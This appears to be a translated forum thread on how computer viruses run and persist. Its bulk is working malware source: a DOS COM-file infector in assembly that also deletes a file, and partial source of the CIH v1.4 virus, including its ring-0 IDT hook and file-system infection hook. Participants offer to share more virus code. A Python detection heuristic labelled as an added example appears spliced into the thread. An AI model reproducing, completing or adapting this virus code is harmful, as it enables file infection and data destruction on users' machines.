How does a virus actually get to run?
For example, the New Happy Time virus (sitting in the d:\aaa directory) only infects when Explorer browses into its directory,
while opening the directory through the Open File dialog does not infect. What about other viruses?
And for hacker tools or trojans, is adding a startup entry under the registry's Run key the only way to get them to run automatically at boot?
Let's discuss; experts, please leave contact details. Many thanks!

Solutions »

  1.   

    New Happy Time infects the Folder.htt file inside a folder. When the folder is opened in Explorer, Folder.htt is read in order to display the folder as a Web page, and so the virus gets executed.
    As for starting at boot, there are many ways; adding a startup entry is far from the only one ^^
      

  2.   

    Process injection can also infect a machine. For example, if I inject a virus process into the Explorer.exe process, the virus starts running every time the system restarts (actually, viruses generally don't use this method; trojans do). A virus generally just infects one or more types of files!
      

  3.   

    Some infect exe files too. I wrote one myself: it traces the exe while it runs, then rewrites it, putting my program in front of it.
      

  4.   

    Registry
    WIN.INI
    SYSTEM.INI
    File associations
      

  5.   

    Writing viruses is an advanced skill. A real virus generally has three properties: infectivity, concealment (also called latency) and destructiveness. There are many kinds of viruses nowadays, such as the common executable-file infectors, macro viruses and so on. But the original and most destructive viruses are still the executable-file infectors (like CIH), and these are generally written in assembly. Many people are curious about viruses and drawn to them, but are often put off by how hard assembly is to learn. Here I'll show you how to write a simple program; it doesn't really count as a virus, but it has a virus's infectivity, which is usually the hardest part for an ordinary person to achieve. OK, on to the point. First, how a virus infects, and how it then executes inside the infected file. The principle is actually very simple: the virus generally writes its code to the tail of the executable, then makes the executable run the virus code at its tail first and afterwards jump back to the original code. Here is an example:
    ;-----------------------------------------
    ; Function: infect the test.com file in the current folder
    ;           and delete the del.txt file in the current folder
    ;           display a preset string
    CSEG SEGMENT
    ASSUME CS:CSEG,DS:CSEG,SS:CSEG
    main PROC NEAR
    mainstart:
    CALL vstart ; start of the virus code
    vstart:
    POP SI ; get the current address
    MOV BP,SI ; save the current address
    PUSH SI
    MOV AH,9
    ADD SI,OFFSET message-OFFSET vstart ; display the preset string
    MOV DX,SI
    INT 21h
    POP SI
    ADD SI,OFFSET yuan4byte-OFFSET vstart ; get the first four bytes of the original program
    MOV DI,100h ; destination address
    MOV AX,DS:[SI] ; start copying
    MOV DS:[DI],AX
    INC SI
    INC SI
    INC DI
    INC DI
    MOV AX,DS:[SI]
    MOV DS:[DI],AX
    MOV SI,BP ; restore the address value
    MOV DX,OFFSET delname-OFFSET vstart
    ADD DX,SI
    MOV AH,41h
    INT 21h
    MOV DX,OFFSET filename-OFFSET vstart ; get the file name
    ADD DX,SI
    MOV AL,02
    MOV AH,3dh ; open the file for read/write
    INT 21h
    JC error
    MOV BX,AX ; file handle
    MOV DX,OFFSET yuan4byte-OFFSET vstart ; read the first four bytes of the file
    ADD DX,SI
    MOV CX,4
    MOV AH,3fh
    INT 21h
    MOV AX,4202h ; seek to the end of the file
    XOR CX,CX
    XOR DX,DX
    INT 21h
    MOV DI,OFFSET new4byte-OFFSET vstart ; save the jump target
    ADD DI,2
    ADD DI,SI
    SUB AX,4
    MOV DS:[DI],AX
    ADD SI,OFFSET mainstart-OFFSET vstart ; prepare to write the virus
    MOV DX,SI
    MOV vsizes,OFFSET vends-OFFSET mainstart
    MOV CX,vsizes
    MOV AH,40h
    INT 21h
    MOV SI,BP ; seek to the start of the file
    MOV AL,0
    XOR CX,CX
    XOR DX,DX
    MOV AH,42h
    INT 21h
    MOV AH,40h ; write the new file header
    MOV CX,4
    MOV DX,OFFSET new4byte-OFFSET vstart
    ADD DX,SI
    INT 21h
    MOV AH,3eh ; close the file
    INT 21h
    error:
    MOV AX,100h
    PUSH AX
    RET
    main ENDP
    yuan4byte:
    RET
    DB 3 DUP (?)
    vsizes DW 0
    new4byte DB 'M',0e9h,0,0
    filename DB "test.com",0
    delname DB "del.txt",0
    message DB "He he he he!"
    DB 0dh,0ah,"$"
    vends:
    start:
    MOV AX,CSEG
    MOV DS,AX
    MOV SS,AX
    CALL main
    MOV AX,4c00h
    INT 21h
    CSEG ENDS
    END start
    That is a simple program that can infect COM files, and it was also the first infectious program I ever wrote back then. How about that? Not hard, right?
    -------------------------------------------------------------------------------
    When a COM file executes, all of its contents are copied into memory starting at address 100h and then executed;
    there are no sections, segments or similar attributes, so COM-file viruses are the simplest viruses of all.
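As an added defender-side example (not code from this thread), here is a Python heuristic for the layout that reply 5 describes: the host's first four bytes become a filler byte plus a JMP whose target is the code appended at the end of the file, and that appended code opens with a CALL/POP stub to learn its own address. The sample images are constructed inline, and the stub pattern check and the file-offset arithmetic are this example's own assumptions based only on the listing above.

```python
"""Heuristic check for the COM-infection layout described in reply 5.
Added example for detection purposes; not code from the thread."""
from dataclasses import dataclass
from typing import Optional


@dataclass
class ComVerdict:
    suspicious: bool
    reason: str
    jump_target: Optional[int] = None  # file offset the entry JMP lands on, if any


def decode_entry_jump(data: bytes) -> Optional[int]:
    """Return the file offset reached by a near JMP (E9 rel16) at the entry point.
    The listing writes 'M', 0E9h, rel16: a one-byte filler opcode and then the JMP,
    so a JMP at offset 0 or at offset 1 is accepted. File offset 0 is address 100h,
    so offsets and addresses differ only by a constant. None if there is no JMP."""
    for start in (0, 1):
        if len(data) >= start + 3 and data[start] == 0xE9:
            rel = int.from_bytes(data[start + 1:start + 3], "little", signed=True)
            return start + 3 + rel  # rel16 is relative to the end of the instruction
    return None


def has_delta_offset_stub(data: bytes, at: int) -> bool:
    """CALL $+3 (E8 00 00) immediately followed by POP r16 (58h..5Fh): the
    get-own-address idiom at the start of appended, position-independent code."""
    return (data[at:at + 3] == b"\xe8\x00\x00"
            and at + 3 < len(data) and 0x58 <= data[at + 3] <= 0x5F)


def check_com_image(data: bytes) -> ComVerdict:
    """Classify a COM image by where its first instruction sends control."""
    if len(data) < 4:
        return ComVerdict(False, "too short to carry the 4-byte entry patch")
    target = decode_entry_jump(data)
    if target is None:
        return ComVerdict(False, "entry point does not start with a near JMP")
    if not 0 <= target < len(data):
        return ComVerdict(True, "entry JMP leaves the image", target)
    if has_delta_offset_stub(data, target):
        return ComVerdict(True, "entry JMP lands on a CALL/POP delta-offset stub", target)
    return ComVerdict(False, "entry JMP lands on ordinary code", target)


# --- constructed sample images (not real files) -------------------------------
# Host: MOV AH,9 / MOV DX,0108h / INT 21h / RET, then the string "Hi$" at 0108h.
CLEAN_COM = b"\xb4\x09\xba\x08\x01\xcd\x21\xc3" + b"Hi$"
# Benign program that starts with a JMP over its data: JMP +3 / "Hi$" / code / padding.
CLEAN_COM_WITH_JMP = (b"\xe9\x03\x00" + b"Hi$"
                      + b"\xb4\x09\xba\x03\x01\xcd\x21\xc3" + b"\x00" * 100)
# Layout the listing produces: host's first 4 bytes replaced by 'M', E9h, (size-4),
# the rest of the host intact, then a tail beginning with the CALL/POP stub (filler after).
_host_size = len(CLEAN_COM)
INFECTED_LAYOUT = (b"M\xe9" + (_host_size - 4).to_bytes(2, "little")
                   + CLEAN_COM[4:] + b"\xe8\x00\x00\x5e" + b"\x90" * 40)

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_COM), ("clean+jmp", CLEAN_COM_WITH_JMP),
                        ("patched", INFECTED_LAYOUT)):
        print(name, check_com_image(image))
```

Legitimate COM programs often begin with a JMP over their data, so the jump alone is not evidence; the verdict hinges on what sits at the target.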
      

  6.   

    CIH v1.4 source code:
    ; ****************************************************************************   
    ; *                     The Virus Program Information                        *   
    ; ****************************************************************************   
    ; *                                                                          *   
    ; *     Designer : CIH                  Source : TTIT of TATUNG in Taiwan    *   
    ; *     Create Date : 04/26/1998        Now Version : 1.4                    *   
    ; *     Modification Time : 05/31/1998                                       *   
    ; *                                                                          *   
    ; *     Turbo Assembler Version 4.0     : tasm /m cih                        *   
    ; *     Turbo Link Version 3.01         : tlink /3 /t cih, cih.exe           *   
    ; *                                                                          *   
    ; *==========================================================================*   
    ; *                     Modification History                                 *   
    ; *==========================================================================*   
    ; *     v1.0    1. Create the Virus Program.                                 *   
    ; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *   
    ; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *   
    ; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *   
    ; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *   
    ; *             6. When System Opens Existing PE File, the File will be      *   
    ; *                Infected, and the File doesn't be Reinfected.             *   
    ; *             7. It is also Infected, even the File is Read-Only.          *   
    ; *             8. When the File is Infected, the Modification Date and Time *   
    ; *                of the File also don't be Changed.                        *   
    ; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *   
    ; *                Previous FileSystemApiHook, it will Call the Function     *   
    ; *                that the IFS Manager Would Normally Call to Implement     *   
    ; *                this Particular I/O Request.                              *   
    ; *            10. The Virus Size is only 656 Bytes.                         *   
    ; *==========================================================================*   
    ; *     v1.1    1. Especially, the File that be Infected will not Increase   *   
    ; *                it's Size...   ^__^                                       *   
    ; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *   
    ; *                When Exception Error Occurs, Our OS System should be in   *   
    ; *                Windows NT. So My Cute Virus will not Continue to Run,    *   
    ; *                it will Jmup to Original Application to Run.              *   
    ; *             3. Use Better Algorithm, Reduce Virus Code Size.             *   
    ; *             4. The Virus "Basic" Size is only 796 Bytes.                 *   
    ; *==========================================================================*   
    ; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *   
    ; *             2. Modify the Bug of v1.1                                    *   
    ; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *   
    ; *==========================================================================*   
    ; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *   
    ; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *   
    ; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *   
    ; *==========================================================================*   
    ; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *   
    ; *             2. Change the Date of Killing Computers.                     *   
    ; * 05/31/1998  3. Modify Virus Version Copyright.                           *   
    ; *             4. The Virus "Basic" Size is 1019 Bytes.                     *   
    ; ****************************************************************************   
                                                                                     
                    .586P                                                            
                                                                                     
    ; ****************************************************************************   
    ; *             Original PE Executable File(Don't Modify this Section)       *   
    ; ****************************************************************************   
                                                                                     
    OriginalAppEXE  SEGMENT                                                          
      

  7.   


    FileHeader:                                                                      
                    db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h           
                    db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h           
                    db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h           
                    db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh           
                    db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h           
                    db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h           
                    db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh           
                    db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh           
                    db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h           
                    db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah           
                    db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h           
                    db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h           
                    db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h           
                    db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h           
                    db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h           
                    db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h           
                    db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h           
                    db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h           
                    dd      00000000h, VirusSize                                     
                                                                                     
                            lea     ecx, StopToRunVirusCode-@0[ebx]                  
                            push    ecx                                              
                                                                                     
                            push    eax                                              
                                                                                     
    ; *************************************                                          
    ; * Let's Modify                      *                                          
    ; * IDT(Interrupt Descriptor Table)   *                                          
    ; * to Get Ring0 Privilege...         *                                          
    ; *************************************                                          
                                                                                     
                            push    eax             ;                                
                            sidt    [esp-02h]       ; Get IDT Base Address           
                            pop     ebx             ;                                
                                                                                     
                            add     ebx, HookExceptionNumber*08h+04h ; ZF = 0        
                                                                                     
                            cli                                                      
                                                                                     
                            mov     ebp, [ebx]      ; Get Exception Base             
                            mov     bp, [ebx-04h]   ; Entry Point                    
                                                                                     
                            lea     esi, MyExceptionHook-@1[ecx]                     
                                                                                     
                            push    esi                                              
                                                                                     
                            mov     [ebx-04h], si           ;                        
                            shr     esi, 16                 ; Modify Exception       
                            mov     [ebx+02h], si           ; Entry Point Address    
                                                                                     
                            pop     esi
      

  8.   


                                                                                     
    ; *************************************                                          
    ; * Generate Exception to Get Ring0   *                                          
    ; *************************************                                          
                                                                                     
                            int     HookExceptionNumber     ; GenerateException      
    ReturnAddressOfEndException     =       $                                        
                                                                                     
    ; *************************************                                          
    ; * Merge All Virus Code Section      *                                          
    ; *************************************                                          
                                                                                     
    ; *************************************                                          
    ; * Generate Exception Again          *                                          
    ; *************************************                                          
                                                                                     
                            int     HookExceptionNumber     ; GenerateException Again
                                                                                     
                                                                                     
    ; *************************************                                          
    ; * Let's Restore                     *                                          
    ; * Structured Exception Handing      *                                          
    ; *************************************                                          
                                                                                     
    ReadyRestoreSE:                                                                  
                            sti                                                      
                                                                                     
                            xor     ebx, ebx                                         
                                                                                     
                            jmp     RestoreSE                                        
                                                                                     
    ; *************************************                                          
    ; * When Exception Error Occurs,      *                                          
    ; * Our OS System should be in NT.    *                                          
    ; * So My Cute Virus will not         *                                          
    ; * Continue to Run, it Jmups to      *                                          
    ; * Original Application to Run.      *                                          
    ; *************************************                                          
                                                                                     
    StopToRunVirusCode:                                                              
    @1                      =       StopToRunVirusCode                               
                                                                                     
                            xor     ebx, ebx                                         
                            mov     eax, fs:[ebx]                                    
                            mov     esp, [eax]                                       
                                                                                     
    RestoreSE:                                                                       
                            pop     dword ptr fs:[ebx]                               
                            pop     eax                                              
                                                                                     
    ; *************************************                                          
    ; * Return Original App to Execute    *                                          
    ; *************************************                                          
                                                                                     
                            pop     ebp                                              
                                                                                     
                            push    00401000h       ; Push Original                  
    OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack       
                                                                                     
                            ret     ; Return to Original App Entry Point             
                                                                                     
    ; *********************************************************                      
    ; *             Ring0 Virus Game Initial Program          *                      
    ; *********************************************************                      
                                                                                     
    MyExceptionHook:                                                                 
    @2                      =       MyExceptionHook                                  
                                                                                     
                            jz      InstallMyFileSystemApiHook                       
                                                                                     
    ; *************************************                                          
    ; * Do My Virus Exist in System !?    *                                          
    ; *************************************                                          
                                                                                     
                            mov     ecx, dr0                                         
                            jecxz   AllocateSystemMemoryPage                         
                                                                                     
                            add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
                                                                                     
      

  9.   

    It would be best if someone could post code written in Delphi;
    ASM and the like are a pain even to read. / by LY http://lysoft.7u7.net http://liuyang.7i24.com http://lysoft.91i.net
      

  10.   

    To the poster above,
    could you send me a copy of the source code?
    [email protected]
      

  11.   

    I've uploaded the CIH 1.4 source to my test page gokuku.yeah.net; grab it if you want it. Any other viruses you need?
      

  12.   

    A virus program is designed to load itself into memory automatically at system startup~~~ it depends on which platform the virus is for~~~
    I've always studied DOS viruses~~ because the machines at school are too old, nothing I can do about it~